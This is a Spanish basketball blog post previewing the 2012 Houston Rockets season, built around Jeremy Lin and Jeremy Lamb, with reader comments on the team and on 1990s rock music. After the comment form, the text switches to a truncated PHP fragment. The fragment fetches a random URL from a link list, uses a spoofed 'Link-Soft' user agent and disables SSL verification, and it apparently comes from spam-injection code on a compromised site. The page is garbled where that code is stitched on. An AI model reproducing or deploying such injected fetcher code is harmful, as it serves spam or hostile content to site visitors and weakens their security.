Houston Rockets: Jeremy

06 de October de 2012 por TheDeerHunter

“daddy didn’t give affection
and the boy was something mommy wouldn’t wear
king jeremy the wicked
ruled his world
jeremy spoke in class today
jeremy spoke in class today
try to forget this…
try to erase this…”

Sin saber muy bien por qué resuenan en mi cabeza las oscuras estrofas de Pearl Jam cuando me dispongo a afrontar este análisis.

Podría pensarse, y en parte es así, que todo se debe a la “sesuda” obviedad de que el nombre del verano para los Rockets es Jeremy. La franquicia apuesta fuerte por dos flamantes perlas de siglas J.L. Los “tocayos” Lin y Lamb están llamados a liderar el nuevo proyecto que D. Daryll Morey ha diseñado con la sutil delicadeza de un cartucho de dinamita. Ah, no lo he dicho… el otro nombre propio es el del turco Omer Asik que como buen paisano de nuestro idolatrado Turkoglu ha sido rápido en firmar un contratejo de 25 kilillos de nada por tres años. Premio de consolación, se conoce, porque no haya aterrizado Howard. Quien no se conforma… 

Del total de incorporaciones se puede decir de todo. Sólo por cantidad, que allí ahora se estila fichar “a granel”, salen cosas interesantes. El proyecto es joven e iremos viendo. Ahora mismo poco se les puede exigir estando como está el Oeste. Tienen fichas para formar un par de equipos de fútbol. Veremos como se apañan.

Peor sabe el tema de las salidas. Limpia radical largando a mucho peso pesado pero odemos entenderlo, ojo. El modelo existente ya sabemos adónde conducía. Campaña más que digna y otra vez a las puertas de los playoffs, como ya venía siendo tradición los últimos 3 años. Si existía la posibilidad ¿real? de traer un primera espada de la liga había que hacer hueco. Sin embargo, ahora no será fácil olvidar nombres importantes que han salido y queda un poso amargo en las formas. Tiene narices que el único que quede es Kevin Martin. Supongo que nadie habrá mostrado interés.

Es en este punto donde el temazo de los Pearl Jam comienza a adquirir nuevos sentidos. Si tuviera que elegir la banda sonora de los Rockets durante la última década sería algo muy parecido a Jeremy. El punto trágico de la historia de Yao, la de T-Mac, Cuttino&Francis… Ante tales antecedentes produce cierto desasosiego apostarlo todo a esta moderna versión de la Cenicienta, el chico de Harvard perdido en el desafecto de la liga, que de la noche a la mañana brilla como pocas veces hayamos visto. Eso sí, de forma fugaz, porque las campanas suenan dejando una resaca en forma de lesión y un zapato en forma de contrato millonario. Veremos si le ajusta al pie. No pienso ir más lejos en tales analogías.

En esta especie de Babilonia de las plantillas queda una columna vertebral joven, interesante, con recorrido. Quitando a Kevin Martin, que no termino de ver cómo encaja en el proyecto, espero ver muchos minutos juntos a Jeremy Lin, Jeremy Lamb, Chandler Parsons, Pattrick Patterson y Omer Asik, como también poder seguir las evoluciones de Terrence Jones, Royce White, Donatas Motiejunas… Diría que ahí tiene que haber talento.

No es momento de pensar en resultados sino de poner cimientos, de abrir horizontes. Veremos que música suena al final de la campaña.

Altas: Jeremy Lin, Omer Asik, Gary Forbes, Carlos Delfino, Toney Douglas, Shaun Livingstone, John Brockman, JaJuan Johnson, Jeremy Lamb, Royce White, Terrence Jones, Donatas Motiejunas

Bajas: Kyle Lowry, Luis Scola, Samuel Dalembert, Chase Budinger, Courtney Lee, Goran Dragic, Marcus Camby

Quinteto: Jeremy Lin, Kevin Martin/ Jeremy Lamb, Chandler Parsons, Pattrick Patterson, Omer Asik
6º hombre: Gary Forbes

Pronóstico: Alrededor de 25 victorias

Comenta

39 comentarios a esta entrada

  1. Heineken dice:
    #1

    Equipo incógnita, todos nuevos, todos jóvenes, mucho “potencial”… habrá que ver si se convierten en jugadores validos.

      Citar

  2. Sancho88 dice:
    #2

    Y Royce White baja indefinida por depresión si mal no me equivoco… a ver qué pueden hacer. El año que viene tendrán todo el salario del mundo tras la salida de Kevin Martin. Puede no ser mala estrategia. Sabían que con el equipo que tenían no podían aspirar más que a pelear por la última posición de playoffs, y gracias. Se la jugaron all-in a por Howard, no les salió, pero al menos lo han intentado. Será la temporada de Lin, efectivamente. Es el tiempo para ver lo que puede hacer como jugador franquicia, que tiene narices que unos pocos meses después de dejar de ser un desconocido, pase a liderar todo un proyecto. A ver cómo sale. A mi, particularmente, este tipo de proyectos me encantan, porque los equipos que se forman así, todo lleno de jóvenes rookies a la buena de dios, suelen dar espectáculo y jugar partidos divertidos. Sí, seguramente acaben últimos en el Oeste, pero empieza una nueva era en los Rockets: la dinastía Lin, jeej.

    Venga, quien se apuesta conmigo unos eurillos a que este señor no acaba siendo titular en el All-Star? Además en Houston… está cantao

      Citar

  3. Sancho88 dice:
    #3

    Por cierto, yo les doy 22-60

      Citar

  4. melo15 dice:
    #4

    Proyecto interesante este de los Rockets, empiezan de 0 y con un buen ramillete de rookies prometedores, lo unico que me chirria es la superpoblacion que tienen en el puesto de ala-pivot, porque Terrence Jones es ya un pseudo 4, Royce White juega tambien de 4, Patterson igual y Motiejunas tambien lo hace. Vamos a ver como se las apañan pero habria que buscar la salida de uno o dos.

    Sancho88: Royce White baja indefinida por depresión si mal no me equivoco

    Sancho, White tiene fobia a los aviones y se ve que con problemas sentimentales y estas cosas. Pero el chaval tiene una clase, ya lo vimos en la Summer League.
    PD: Tio Deer me encanta como escribes.

      Citar

  5. MagicJohnson32 dice:
    #5

    Jereeeeemyyyyyyyyyyyy… Opinaría sobre los Rockets pero me he de ir urgentemente a escuchar a Pearl Jam!!

      Citar

  6. nba dice:
    #6

    Yo voy a decir una herejia y me da a mi que van a acabar por delante de Denver

      Citar

  7. Denise dice:
    #7

    El equipo para este año es una castaña, pero al menos han reconstruido totalmente, no como Orlando por ejemplo. La limpieza de este verano no servirá para obtener frutos este año, pero si a largo plazo conforme los rookies y sophomores vayan teniendo minutos y protagonismo.

    Lo unico que le puede pedir el coach a estos chicos es que salgan ahí, luchen, se diviertan y vayan progresando. Ademas, el hecho de que tenga tantos jovenes, les hace atractivos de ver.

    Pronostico: Penúltimos del Oeste por delante de los Kings y con un 27-57

      Citar

  8. Denise dice:
    #8

    Por cierto, se me olvidó gran alusión lo de Jeremy ….nunca se me había pasado por la cabeza y mira que escuche veces la canción.
    PD: Melo y otros adolescentes por aquí, os recomiendo 3 discos del 91. “Nevermind”, “Ten” y “Blood Sugar Sex Magik”. Como artistas, me quedo con los Red Hot. (perdon por el semi off-topic pero hay que educar musicalmente a la juventud :))

      Citar

  9. Sancho88 dice:
    #9

    Denise: Pronostico: Penúltimos del Oeste por delante de los Kings y con un 27-57

    Te vas a comer tus palabras chato, ya lo verás

      Citar

  10. MagicJohnson32 dice:
    #10

    No, tío, Peal Jam de calle 😉

    El 91 es un año muy grande, tanto en el rock, como en el pop, el grunge, el indie… De ese año son también el “Achtung Baby” de U2, el “Out of Time” de R.E.M., los “Use Your Illusion” de Guns n’ Roses, el “Blue Lines” de Massive Attack, el “No Pocky for Kitty” de Superchunk, el “Bandwagonesque” de Teenage Fanclub”, el “Loveless” de My Bloody Valentine, el ‘black album’ de Metallica, y el “Recurring” de Spacemen 3, y más que me dejo seguro.

    Volviendo a los Rockets… nba, ¿crees que los Rockets ganarán muchos partidos o que los Nuggets ganarán muy pocos?

      Citar

  11. nba dice:
    #11

    Yo es que opino que los Rockets seran una sorpresa, no para clasificarse para Playoffs, pero si que daran guerra en la liga, en cambio Denver, son bajo mi punto de vista un equipo “aburrido”, aunque esten Lowry, Mcgee, y el “Animal”, y teniendo en cuenta la escabechina que se prevee en el Oeste considero que estos Nuggets no rendiran al nivel que se les espera y quedaran por debajo de Rockets

      Citar

  12. Sancho88 dice:
    #12

    Lowry? What tha fuck?

      Citar

  13. MagicJohnson32 dice:
    #13

    Supongo que te refieres a Lawson. Y te aseguro que pocos equipos va a haber este año más entretenidos que los Nuggets. Imagina a Lawson, Iguodala, Gallinari, Faried, McGee, Chandler, Randolph, Andre Miller… corriendo arriba y abajo. ¿Aburrido?

      Citar

  14. nba dice:
    #14

    Cierto Magic-Sancho, me referia a Lawson, es que me parecen primos-hermanos, y expreso que no tienen a ningun Top de la liga, que haga que realmente te levantes del sillo.Yo es que creo que este año los que estaban abajo en el Oeste van a subir bastante, y los de arriba despues de como han fichado probablemente se pondran en modo trituradora-on, e iran dejando cadaveres por el camino, y uno de ellos sera Denver.

      Citar

  15. rumbero dice:
    #15

    Discazos si señor. Para completar la colección grunge se puede meter también el “Badmotorfinger” de Soundgarden (discazo, incluso mejor que el Superunknown).

    nba:
    Yo voy a decir una herejia y me da a mi que van a acabar por delante de Denver

    Buff…pues yo soy de los que pone a Denver como sorpresa positiva para este año. Veo difícil que estos Rockets con tanto (tanto, tanto) chaval puedan quedar por delante. Yo sigo un poco en la línea de Denise, el equipo para este año es bastante justito para hacer algo, pero hay base como para hacer algo en unos años. Su objetivo sería foguear a todos los poyuelos para ver su “potencial” real (incluido el señor Lin) y a ver que pescan en el próximo draft. A criticar la cantidad de fichas que tienen (muy bueno lo de los equipos de futbol) y el contrato firmado a Asik

      Citar

  16. Denise dice:
    #16

    nba:
    Yo es que opino que los Rockets seran una sorpresa, no para clasificarse para Playoffs, pero si que daran guerra en la liga, en cambio Denver, son bajo mi punto de vista un equipo “aburrido”, aunque esten Lowry, Mcgee, y el “Animal”, y teniendo en cuenta la escabechina que se prevee en el Oeste considero que estos Nuggets no rendiran al nivel que se les espera y quedaran por debajo de Rockets

    Respeto al maximo tu comentario, pero me parece un autentico WTF…, con los jugadores que tiene Denver, la palabra aburrido creo que sera un antónimo para ellos.
    Y vaya hueso duro de roer para los a priori favoritos Lakers, OKC y Clippers

      Citar

  17. Denise dice:
    #17

    MagicJohnson32:
    No, tío, Peal Jam de calle

    El 91 es un año muy grande, tanto en el rock, como en el pop, el grunge, el indie… De ese año son también el “Achtung Baby” de U2, el “Out of Time” de R.E.M., los “Use Your Illusion” de Guns n’ Roses, el “Blue Lines” de Massive Attack, el “No Pocky for Kitty” de Superchunk, el “Bandwagonesque” de Teenage Fanclub”, el “Loveless” de My Bloody Valentine, el ‘black album’ de Metallica, y el “Recurring” de Spacemen 3, y más que me dejo seguro.

    Para no caer en el mas profundo de los off-topics…

    Quizas los grupos que mencionas puedan ser mas jugadores franquicias que los Red Hot, pero éstos son un jugador de los que me gustan, polivalentes , capaces de defenderse en muchas canchas complicadas como el Pop, Rock, Funk, Rap, Jazz, eso es lo que me gusta, algunos que mencionas siempre utilizan el mismo esquema de juego, en cambio el punto clave de Red Hot es la versatilidad de este equipo, que cada año y disco que pasa reinventa su juego y hace cosas distintas; el juego que hacían en el 91 no tiene nada que ver con el que hacen en 2012, pero sigue siendo bueno y útil; por no hablar de que llevan 29 años jugando y…lo que le quedan.

    Por cierto, son grandes aficionados a tus Lakers.

      Citar

  18. Chipi dice:
    #18

    Es curioso, porque cuando leí el análisis de los Magic tenía puesto Pearl Jam, concretamente Black, y lo relacioné enseguida.

    A ver si estos Rockets tienen un opco de la suerte que tanto les ha dado la espalda estos últimos años. Personalmente soy de los que aún creen que la estrella de Lin se apagará algún día y que no es tan fuera de serie. Eso sí, si sigue al nivel del año pasado acabará siendo un jugador espectacular.

      Citar

  19. Melo15 dice:
    #19

    Haber Magic, Denis, musica del siglo VXII no por favor 😉 Bruno Mars, Rihanna, Lil Wayne, Chris Brown….

      Citar

  20. simon dice:
    #20

    o Justin Bieber no Melo? jjejejeje

      Citar

  21. MagicJohnson32 dice:
    #21

    Melo, música del siglo que quieras, por favor, pero algo decente :p

      Citar

  22. simon dice:
    #22

    nba:
    Yo es que opino que los Rockets seran una sorpresa, no para clasificarse para Playoffs, pero si que daran guerra en la liga, en cambio Denver, son bajo mi punto de vista un equipo “aburrido”, aunque esten Lowry, Mcgee, y el “Animal”, y teniendo en cuenta la escabechina que se prevee en el Oeste considero que estos Nuggets no rendiran al nivel que se les espera y quedaran por debajo de Rockets

    nba:
    Yo voy a decir una herejia y me da a mi que van a acabar por delante de Denver

    uuuyyy lo que ha dicho…

      Citar

  23. Josgel dice:
    #23

    VXII Qué siglo és ese?
    Bruno Mars, Rihanna,etc? Eso és música?
    Provocador.

    A mi Houston me recuerda a un semillero. Muchas semillas, pero a ver cuantas valen? El número de buenas marcará el signo de la temporada y el futuro de la franquicia.

      Citar

  24. GreenPride dice:
    #24

    Equipo nuevo en Houston ya que está claro que se habían cansado de rozar los playoffs y no evolucionar. Limpia total y la verdad que yo estoy de acuerdo en el planteamiento pero no en varios de los fichajes realizados. Los contratazos en dos jugadores nada contrastados como Lin y Asik creo que son muy arriesgados y muy difíciles que les salgan bien. Equipo de lotería claramente y año para dejar claro cuales jugadores les valen para el futuro y cuales no.

      Citar

  25. Nacho dice:
    #25

    El contratazo de Lin está super amortizado. MERCADO. Y como dice Sancho, All Star. Equipo a analilzar en un par de años, como decís bien por aquí.

    Sobre el OffTopic del momento (nunca supe que es off Topic, pero se sobre entiende.)
    Pearl Jam siempre me parecieron un coñazo, pero a todos mis amigos les gustaba. Su famoso Unplugged hizo que todos lo quisieran imitar, suficiente para darles Palo, como a los del Jarabe. Insoportables.
    Me molaban los Red Hot, pero Denise, lo mezclan todo, pero siempre igual. Momentazo su concierto en las Ventas del noventaitantos, pero mi mejor recuerdo de esa noche es que cuando terminó vimos gratis en una sala de Madrid a Manu Chao con unos colgaos, había miles de personas y aún no sé porqué pasé, pero lo hice.
    Y faltaba hablar de Soungarden y Smashing Pumpkins. Radiohead, Alice In Chains, Faith No More, Jane’s Addiction (casi tan coñazo como Pearl, pero menos. Y algún tema bueno.
    Me quedo, porque también han sido un poco olvidados con Rage Against The Machine

      Citar

  26. MagicJohnson32 dice:
    #26

    Pero hombre de dios, si el unplugged de Pearl Jam fue muuuuy al principio de su carrera (de hecho, acabado de publicar su debut) y ni siquiera se comercializó el vídeo. Y que me digas que un grupo con temones como Alive, Even Flow, Do The Evolution, Black, Jeremy o Better Man es un coñazo… Chico, a mí me encanta mucha de la discografía de Radiohead, pero entiendo a quien los considera un coñazo. ¿Pero Pearl Jam?

    No sé, intuyo que tienes algo personal contra ellos :p)

    Y sobre los Rockets, que algo hay que decir… ¡¡¡balones a Parsons!!!

      Citar

  27. Chipi dice:
    #27

    A la hora de hablar de Pearl Jam quizás lo justo sería diferenciar entre Pearl Jam y Eddie Vedder. Si no lo habéis visto, os recomiendo el documental PJ 20, que cuenta la historia del grupo y parte de la historia del boom del grunge en los primeros 90. En youtube lo podéis encontrar subtitulado.

      Citar

  28. Denise dice:
    #28

    En mi opinión, Pearl Jam tienen buenas canciones pero carece de musicos virtuosos. Vedder tiene esa voz desgarrada que es buena pero personalmente no me gusta aunque puede considerarse un gran vocalista; pero los demas musicos son normalitos. Y sobre la innovación, no trajeron nada nuevo a la música, siguieron la estela abierta por Nirvana. Y por último, su madurez, en estos últimos años no ha sido buena y no he apreciado tendencia alguna por hacer algo nuevo En definitiva, me parece un correcto grupo sin catalogarlo de cracks.

    Yo soy más de Red Hot, que ha contado con 2 virtuosos de los mejores de la historia en sus respectivos instrumentos (Flea y Frusciante), innovaron el panorama musical con su divertido y gamberro funk-rock-rap para posteriormente a lo largo de los años ir renovandose y renaciendo con un rock-pop melódico y maduro.

    Eso si, la canción dedicada a Magic Johnson, llamada como él, entraría en un Top 5 de sus canciones mas mierdas. que nadie se guíe por esa horrible canción….
    ¿Por qué casi todos mis idolos tienen que ser fan de los Lakers?

    PD: Oye Txusma, Deer y/o demas propietarios del blog, si nos estamos pasando con este tema, comentadlo y yo por mi parte lo dejo.

      Citar

  29. Sancho88 dice:
    #29

    Yo confieso que en la puta vida he escuchado a Pearl Jam. Voy al tutubo porque ya me pica la curiosidad y to, jejej

      Citar

  30. txusma dice:
    #30

    Denise:

    PD: Oye Txusma, Deer y/o demas propietarios del blog, si nos estamos pasando con este tema, comentadlo y yo por mi parte lo dejo.

    A mi no me molesta lo más mínimo… 😀

      Citar

  31. Nacho dice:
    #31

    Con Denise en el primer párrafo. Lo de los virtuosos, bien, pero menos, había muchos y más en esa época. y lo de la renovación, chico sigo sin verlo, desde hace quince años me aburren.
    Ya veo que aquí somos frikis también en esto.
    Y para canción símbolo de un equipo “The boys are backing town “de los Detroit de título del 2003? Es que para es el temazo de siglos y Thin Lizzy y en concreto Phil Lynott un crack, y un virtuoso. También tienen tema para los Jail Brazers.
    Magic, aunque te “joda” que tilde a Pearl de coñazo, un reflexiones con músicas para equipos gloriosos y de ahora no estaría mal. No te toco más los Pearls.

    Y por hablar de los Rockets, apuestas. Jeremy Lin el más votado del Oeste para el All Star.

      Citar

  32. MagicJohnson32 dice:
    #32

    Eso me recuerda unas tonterías que publiqué hace siglos (¡¡finales de 2007!!) aquí, “los hits de TJNBA”:

    http://blog.tjnba.com/2007/12/31/los-hits-tjnba/
    http://blog.tjnba.com/2007/12/31/los-hits-tjnba-ii/
    http://blog.tjnba.com/2008/01/03/los-hits-tjnba-iii/

    Hay poco rock, es más bien indie, pero puede que encontréis algo que os guste…

      Citar

  33. Denise dice:
    #33

    jaja, muy bueno eso…lo del tiro en el brazo de Tinsley y el dinero facil de los Cardinal, Lafrentz etc…jeje

      Citar

  34. MagicJohnson32 dice:
    #34

    Fue una excusa como cualquier otra para hablar de Wilco y de Nick Cave, que son lo más grande que hay, jeje.

    Por cierto, Denise tenías otro comentario como el anterior pero citando el mío que estaba pendiente de aprobación. Lo he eliminado ¿ok?

      Citar

  35. Denise dice:
    #35

    si, el comentario era el mismo que el anterior pero tu comentario tenia enlaces, y al citarte, tengo la sensacion de que en este blog, cuando pones en un enlace, tu comentario queda pendiente de aprobacion.

    Wilco nunca lo he escuchado, de hecho creia que era un grupo indie que hay cuya vocalista era una mujer, pero tras mirarlo en wikipedia, no he visto femina por ningun lado.

      Citar

  36. Esteban dice:
    #36

    viendo estos partidos de pretemporada, sonrien en la gran manzana y los rockets deben estar agarrandose la cabeza, pesimo pesimo arranque de LIN, harbra que ver como se levanta, pero por el momento, un bluf

      Citar

  37. Sancho88 dice:
    #37

    eso iba a decir yo, que Lin está haciendo chof chof…

      Citar

  38. RSB3 dice:
    #38

    Serán divertidos de ver, partidos de muchos puntos, pero recibirán más aún.

    Últimos de conferencia salvo milagro. Además es un equipo con vistas al futuro, tontos serían si no tankearan a saco. Deberían estar entre los 4 peores registros y hacer una llamadita a la suerte

      Citar

  39. rumbero dice:
    #39

    Denise:
    Primeros partidos de la Liga de Verano de Orlando, no sirve como referencia para saber que jóvenes son buenos o no, pero algo es algo.

    En la victoria de Orlando sobre Boston, lo más destacable ha sido el 25-7 de Olynik, mientras que por los Magic, Oladipo ha debutado con 18 ptos, 6 rebotes, 7 asistencias y 5 robos; mientras que el chico de segunda ronda Romero Osby ha metido 18 puntos con 7/8 en tiros.

    En el Utah-Miami, Trey Burke debutó mal con un 1 de 12 en tiros, y Rudy Gobert 6-4. Alec Burks se ha lesionado en el tobillo pero no parece grave, y si lo es, no pasa nada, mas tankinh todavía para cuando empiecen la liga.

    En el Philadelphia-Houston, Carter Williams ha hecho un 26-7-8 pero tirandose las zapatillas (8-23 en tiros de campo) y 9 perdidas. Por los cohetes, Terrence Jones 24-12.

    En el Thunder-Pacers, 9-9 de Plumlee por Indiana, mientras que por los Thunder, Lamb 14-6, a ver si Brooks le da minutos a este chaval en la liga.

    Yo vi un rato del ORL-BOS y si bien uno no se puede fiar casi nada en la SL, Oladipo me dejó muy buenas sensaciones. Parece que está preparado para esto. Y luego Olynik que habrá que verlo más y contra otros grandotes pero que confirma que en ataque no es nada manco.

    Quedaba el Pistons – Nets que nos dejó unos números de Drummond bastante surrealistas 12 puntos (5/14, 2/9 TL), 16 rebotes, 5 robos, 7 pérdidas, 6 tapones, 6 faltas en 25 minutos. Un bicho. Y mal Caldwell-Pope 1/10 tiro (0/8 triples), 4 pérdidas y se llevó un mini poster de Plumlee de regalo.
    Pero la estrella del partido fue Jason Kidd. Primera técnica como entrenador en una “pachanga” de Summer League y ordenando el Hack-a-Dru a los suyos. Vaya crack

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>